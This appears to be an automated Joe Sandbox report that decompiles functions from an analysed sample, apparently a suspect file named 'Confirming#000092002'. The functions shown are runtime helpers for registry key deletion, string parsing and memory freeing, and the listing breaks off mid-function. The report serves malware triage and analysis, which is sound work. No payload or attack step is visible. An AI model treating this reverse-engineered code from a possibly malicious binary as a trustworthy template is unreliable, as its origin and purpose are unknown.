			E00EA1596(void** __ecx, char* _a4) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t9;

				_t13 = __ecx;
				_t12 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					if( *0xfe2e00 != 0) {
						_t6 =  *0xfe2dfc; // 0x0
					} else {
						_t9 = GetModuleHandleA("Advapi32.dll");
						if(_t9 == 0) {
							_t6 =  *0xfe2dfc; // 0x0
						} else {
							_t6 = GetProcAddress(_t9, "RegDeleteKeyExA");
							 *0xfe2dfc = _t6;
						}
						 *0xfe2e00 = 1;
					}
					if(_t6 == 0) {
						return RegDeleteKeyA( *_t13, _a4);
					} else {
						return  *_t6( *_t13, _a4, _t13[1], 0);
					}
				}
				return E00EA13BB(_t12,  *((intOrPtr*)(__ecx)), _a4);
			}

0x00ea159a
0x00ea159c
0x00ea15a1
0x00ea15b6
0x00ea15e8
0x00ea15b8
0x00ea15bd
0x00ea15c5
0x00ea15da
0x00ea15c7
0x00ea15cd
0x00ea15d3
0x00ea15d3
0x00ea15df
0x00ea15df
0x00ea15ef
0x00000000
0x00ea15f1
0x00000000
0x00ea15fb
0x00ea15ef
0x00000000

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,?,00EA339A,?), ref: 00EA15BD
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00EA15CD

Part of subcall function 00EA13BB: GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00EA13CD
Part of subcall function 00EA13BB: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00EA13DD

Strings

RegDeleteKeyExA, xrefs: 00EA15C7
Advapi32.dll, xrefs: 00EA15B8

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExA
API String ID: 1646373207-1984814126
Opcode ID: 96b997f5150892ffa1f0dafc259f35b49371c28cf3e70acb74dcdb08726801a1
Instruction ID: ad3d967fd131e9ba28eabdfc93159dd4573da7db79e0dc03d54fd9ca61c268a2
Opcode Fuzzy Hash: 96b997f5150892ffa1f0dafc259f35b49371c28cf3e70acb74dcdb08726801a1
Instruction Fuzzy Hash: C7012635908245EFEB218F92DC04FA27BAABB49381F0450AAF543BD160CB72E910FB00

Uniqueness

Uniqueness Score: -1.00%

Function 00EAD164 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00EAD164(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xeb9008; // 0x64e1d101
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E00EAE5EF(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00EAB0CA(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00EA403C(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00EABF54(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00EAB0CA(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E00EA99EA(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00EA99EA(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00EABF54(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00EAB146();
									if(_t95 != 0) {
										E00EABF54(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E00EA8BBC(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E00EB02F0(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E00EA99EA(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E00EA8BBC(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E00EB02F0(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x00ead169
0x00ead16a
0x00ead16b
0x00ead172
0x00ead177
0x00ead17d
0x00ead183
0x00ead189
0x00ead18c
0x00ead18c
0x00ead18f
0x00ead191
0x00ead191
0x00ead18f
0x00ead193
0x00ead198
0x00ead19f
0x00ead1a2
0x00ead1a2
0x00ead1c3
0x00ead1c5
0x00ead1c8
0x00ead1cd
0x00ead32b
0x00ead32e
0x00ead32f
0x00ead330
0x00ead33c
0x00ead1d3
0x00ead1d6
0x00ead1db
0x00ead1dd
0x00ead1df
0x00ead216
0x00ead218
0x00ead21a
0x00ead320
0x00ead320
0x00ead322
0x00ead323
0x00ead329
0x00000000
0x00ead329
0x00ead229
0x00ead22e
0x00ead233
0x00000000
0x00000000
0x00ead239
0x00ead250
0x00ead254
0x00000000
0x00000000
0x00ead25a
0x00ead262
0x00ead29f
0x00ead2a4
0x00ead2a6
0x00ead2a8
0x00ead2d9
0x00ead2db
0x00ead2dd
0x00ead319
0x00ead31a
0x00000000
0x00ead2fa
0x00ead2fc
0x00ead2fd
0x00ead301
0x00ead33d
0x00ead340
0x00ead303
0x00ead303
0x00ead304
0x00ead304
0x00ead305
0x00ead306
0x00ead307
0x00ead308
0x00ead310
0x00ead317
0x00ead346
0x00000000
0x00000000
0x00000000
0x00000000
0x00ead317
0x00ead2dd
0x00ead2ac
0x00ead2c7
0x00ead2cc
0x00000000
0x00000000
0x00ead2ce
0x00ead2d4
0x00ead2d4
0x00000000
0x00ead2d4
0x00ead2ae
0x00ead2b3
0x00ead2b7
0x00000000
0x00000000
0x00ead2b9
0x00000000
0x00ead2b9
0x00ead264
0x00ead269
0x00000000
0x00000000
0x00ead271
0x00000000
0x00000000
0x00ead28d
0x00ead291
0x00000000
0x00000000
0x00000000
0x00ead297
0x00ead1e6
0x00ead201
0x00ead206
0x00ead211
0x00ead211
0x00000000
0x00ead211
0x00ead208
0x00ead20e
0x00ead20e
0x00000000
0x00ead20e
0x00ead1e8
0x00ead1ed
0x00ead1f1
0x00000000
0x00000000
0x00ead1f3
0x00000000
0x00ead1f3

APIs

__alloca_probe_16.LIBCMT ref: 00EAD1E8
__alloca_probe_16.LIBCMT ref: 00EAD2AE
__freea.LIBCMT ref: 00EAD31A

Part of subcall function 00EA8BBC: HeapAlloc.KERNEL32(00000000,00EA3522,?,?,00EA3CF2,?,00000000,?,00EA3522,?), ref: 00EA8BEE

__freea.LIBCMT ref: 00EAD323
__freea.LIBCMT ref: 00EAD346

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 2d9d1cdb6da19cf02694a47726ce62105c8f92bf5608342bf94e97ae1cce820e
Instruction ID: dfdbf14fec3ed9ee7696700d470b14faf0f73bf4829f3a96e637a9871d7e6dd1
Opcode Fuzzy Hash: 2d9d1cdb6da19cf02694a47726ce62105c8f92bf5608342bf94e97ae1cce820e
Instruction Fuzzy Hash: F751D072A04206ABEF219F648C81EBB37E9EF8A754F155128FC06BF551E730FC1486A1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2327 Relevance: 7.6, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00EA2327(CHAR** __ecx, CHAR* _a4) {
				char* _v8;
				CHAR** _v12;
				char _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t26;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t36;
				CHAR* _t39;
				void* _t40;
				void* _t45;
				char _t46;
				CHAR* _t51;
				char* _t56;
				CHAR** _t58;
				void* _t61;

				_push(__ecx);
				_push(__ecx);
				_t58 = __ecx;
				_v12 = __ecx;
				E00EA22FE(__ecx);
				_t36 =  *__ecx;
				_t16 =  *_t36;
				if(_t16 == 0) {
					L27:
					_t17 = 0x80020009;
				} else {
					_t56 = _a4;
					_v8 = _t56;
					if(_t16 != 0x27) {
						while(1) {
							_t19 = _t16 - 9;
							if(_t19 == 0) {
								break;
							}
							_t20 = _t19 - 1;
							if(_t20 == 0) {
								break;
							} else {
								_t21 = _t20 - 3;
								if(_t21 == 0 || _t21 == 0x13) {
									break;
								} else {
									_t23 = CharNextA(_t36);
									 *_t58 = _t23;
									_t24 = _t23 - _t36;
									_a4 = _t24;
									if(_t56 + 1 + _t24 >= _v8 + 0x1000) {
										goto L27;
									} else {
										_t45 = 0;
										if(_t24 > 0) {
											_t51 = _t24;
											do {
												 *_t56 = _t36[_t45];
												_t56 = _t56 + 1;
												_t45 = _t45 + 1;
											} while (_t45 < _t51);
										}
										_t36 =  *_t58;
										_t16 =  *_t36;
										if(_t16 != 0) {
											continue;
										} else {
											break;
										}
									}
								}
							}
							goto L28;
						}
						 *_t56 = 0;
						goto L26;
					} else {
						_t26 = CharNextA(_t36);
						 *_t58 = _t26;
						_t46 =  *_t26;
						if(_t46 == 0) {
							L14:
							if( *( *_t58) == 0) {
								goto L27;
							} else {
								 *_t56 = 0;
								 *_t58 = CharNextA( *_t58);
								L26:
								_t17 = 0;
							}
						} else {
							while(_t46 != 0x27 ||  *(CharNextA(_t26)) == 0x27) {
								_t29 =  *_t58;
								if( *_t29 == 0x27) {
									 *_t58 = CharNextA(_t29);
								}
								_t30 =  *_t58;
								_a4 = _t30;
								_t39 = CharNextA(_t30);
								 *_t58 = _t39;
								_t40 = _t39 - _a4;
								if(_t56 + 1 + _t40 >= _v8 + 0x1000) {
									goto L27;
								} else {
									if(_t40 > 0) {
										_t61 = _a4 - _t56;
										do {
											 *_t56 =  *((intOrPtr*)(_t61 + _t56));
											_t56 = _t56 + 1;
											_t40 = _t40 - 1;
										} while (_t40 != 0);
										_t58 = _v12;
									}
									_t26 =  *_t58;
									_t46 =  *_t26;
									if(_t46 == 0) {
										goto L27;
									} else {
										continue;
									}
								}
								goto L28;
							}
							goto L14;
						}
					}
				}
				L28:
				return _t17;
			}

0x00ea232a
0x00ea232b
0x00ea232e
0x00ea2331
0x00ea2334
0x00ea2339
0x00ea233b
0x00ea233f
0x00ea2434
0x00ea2434
0x00ea2345
0x00ea2345
0x00ea2348
0x00ea234d
0x00ea23db
0x00ea23de
0x00ea23e1
0x00000000
0x00000000
0x00ea23e3
0x00ea23e6
0x00000000
0x00ea23e8
0x00ea23e8
0x00ea23eb
0x00000000
0x00ea23f2
0x00ea23f3
0x00ea23ff
0x00ea2407
0x00ea240b
0x00ea2410
0x00000000
0x00ea2412
0x00ea2412
0x00ea2416
0x00ea2418
0x00ea241a
0x00ea241d
0x00ea241f
0x00ea2420
0x00ea2421
0x00ea241a
0x00ea2425
0x00ea2427
0x00ea242b
0x00000000
0x00000000
0x00000000
0x00000000
0x00ea242b
0x00ea2410
0x00ea23eb
0x00000000
0x00ea23e6
0x00ea242d
0x00000000
0x00ea2353
0x00ea235a
0x00ea235c
0x00ea235e
0x00ea2362
0x00ea23c9
0x00ea23ce
0x00000000
0x00ea23d0
0x00ea23d0
0x00ea23d7
0x00ea2430
0x00ea2430
0x00ea2430
0x00ea2364
0x00ea2364
0x00ea2371
0x00ea2376
0x00ea237b
0x00ea237b
0x00ea237d
0x00ea2380
0x00ea238b
0x00ea2393
0x00ea2395
0x00ea239c
0x00000000
0x00ea23a2
0x00ea23a4
0x00ea23a9
0x00ea23ab
0x00ea23ae
0x00ea23b0
0x00ea23b1
0x00ea23b1
0x00ea23b6
0x00ea23b6
0x00ea23b9
0x00ea23bb
0x00ea23bf
0x00000000
0x00ea23c1
0x00000000
0x00ea23c1
0x00ea23bf
0x00000000
0x00ea239c
0x00000000
0x00ea2364
0x00ea2362
0x00ea234d
0x00ea2439
0x00ea243d

APIs

Part of subcall function 00EA22FE: CharNextA.USER32(?,?,00EA2339,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA231B

CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA235A
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA236A
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2379
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA2383
CharNextA.USER32(?,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23D5
CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00EA2CA6,?,00000000,?,00000000,00000000,?), ref: 00EA23F3

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 3693f6b978da2096d6baf10a73c908b5df5cd42c17581b25d98071b3a77f8103
Instruction ID: f1997180daab5a44e5fdad2b425a2232016a68ecd5df160c29b4bfae2cd6612c
Opcode Fuzzy Hash: 3693f6b978da2096d6baf10a73c908b5df5cd42c17581b25d98071b3a77f8103
Instruction Fuzzy Hash: 6C41D0305002829FDF258F3DC8946A9BBE5AF1F344B68696CD6C5FB216D274A845C760

Uniqueness

Uniqueness Score: -1.00%

Function 00EABCA8 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EABCA8(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xeb96e8; // 0xeb9738
					if(_t23 != 0) {
						E00EA8B82(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xeb96ec; // 0xfe2dd8
					if(_t24 != 0) {
						E00EA8B82(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xeb96f0; // 0xfe2dd8
					if(_t25 != 0) {
						E00EA8B82(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xeb9718; // 0xeb973c
					if(_t26 != 0) {
						E00EA8B82(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xeb971c; // 0xfe2ddc
					if(_t27 != 0) {
						return E00EA8B82(_t6);
					}
				}
				return _t6;
			}

0x00eabcae
0x00eabcb3
0x00eabcb7
0x00eabcbd
0x00eabcc0
0x00eabcc5
0x00eabcc9
0x00eabccf
0x00eabcd2
0x00eabcd7
0x00eabcdb
0x00eabce1
0x00eabce4
0x00eabce9
0x00eabced
0x00eabcf3
0x00eabcf6
0x00eabcfb
0x00eabcfc
0x00eabcff
0x00eabd05
0x00000000
0x00eabd0d
0x00eabd05
0x00eabd10

APIs

_free.LIBCMT ref: 00EABCC0

Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA

_free.LIBCMT ref: 00EABCD2
_free.LIBCMT ref: 00EABCE4
_free.LIBCMT ref: 00EABCF6
_free.LIBCMT ref: 00EABD08

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a915595f67cbb017b941a32d0322d7425a79b2dcb7c718c41258ccba79a577fd
Instruction ID: a5b7b9148dadde47a21054e69e131969d9c80bb5b9b3dda0c593eb237a7d3319
Opcode Fuzzy Hash: a915595f67cbb017b941a32d0322d7425a79b2dcb7c718c41258ccba79a577fd
Instruction Fuzzy Hash: 6FF01272904610ABC620EF69F6C6C5777D9AB1A735B586905F145FF502CF30FD808660

Uniqueness

Uniqueness Score: -1.00%

Function 00EAA03C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00EAA03C(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E00EA7F8F(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E00EACB84(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E00EA749C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00EA9E27(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E00EACB84(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00EAA626(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E00EA8B82(_t300);
														_t302 = _v12;
													}
													E00EA8B82(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E00EACB84(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00EA749C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0xeb9008; // 0x64e1d101
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E00EAD0C0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
